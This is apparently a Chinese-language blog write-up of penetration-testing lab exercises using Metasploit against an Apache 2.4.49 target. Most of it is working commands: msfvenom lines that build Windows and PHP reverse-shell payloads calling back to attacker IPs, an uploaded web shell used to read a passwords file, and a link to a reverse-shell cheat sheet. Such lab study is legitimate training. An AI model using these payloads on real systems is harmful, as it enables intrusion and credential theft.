Metasploit Payloads
Metasploit Payloads
接續上一節,在 Apache 2.4.49 選擇模組中選了 0 後可以查看相關 payload
輸入 show payloads,可以看到下圖的 17 是我們上一節使用的 payload
這次要利用的是 11,payload/linux/x64/meterpreter_reverse_https
set payload payload/linux/x64/meterpreter_reverse_https
use 11,show options 看一下要輸入那些值,看到有個 LURI 的值
run 之後輸入 shell 直接查找檔案 passwords 然後 cat 拿 flag
Metasploit 還提供將有效負載匯出為各種檔案類型和格式的功能,例如 Windows 和 Linux 二進位檔案、Webshell 等。Metasploit 包含 msfvenom 作為產生這些有效負載的獨立工具。它提供標準化的命令列選項,並包括各種自訂有效負載的技術。
為了熟悉 msfvenom,我們首先建立一個惡意 Windows 二進位文件,啟動原始 TCP 反向 shell。讓我們先列出所有有效負載,並將有效負載作為-l的參數。此外,我們使用 --platform指定有效負載的平台,並使用--arch 指定架構。
指令 └─$ msfvenom -l payloads --platform windows --arch x64
讓我們使用 -p 標誌來設定有效負載,設定 LHOST 和 LPORT 來分配反向連接的主機和端口
參數 -f 來設定輸出格式(在本例中為 exe),以及 -o 來指定輸出檔案姓名
針對上述我們看到的一個有效 payload 作設置, windows/x64/shell_reverse_tcp
指令 : msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.186 LPORT=443 -f exe -o nonstaged.exe
建立一個 123.pHP payload
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.45.186 LPORT=4444 R > 123.pHP
上傳成功
或是上傳 simple-backdoor.pHP 然後執行
http://192.168.249.189/meteor/uploads/simple-backdoor.pHP?cmd=type%20C:\xampp\passwords.txt
拿 flag
製作 php Windows 用的 reserve shell 指令
└─$ msfvenom -p php/reverse_php LHOST=192.168.45.242 LPORT=4444 -f raw > shell2.pHP
好用網站,msfvenom 製作 payload
https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
留言
張貼留言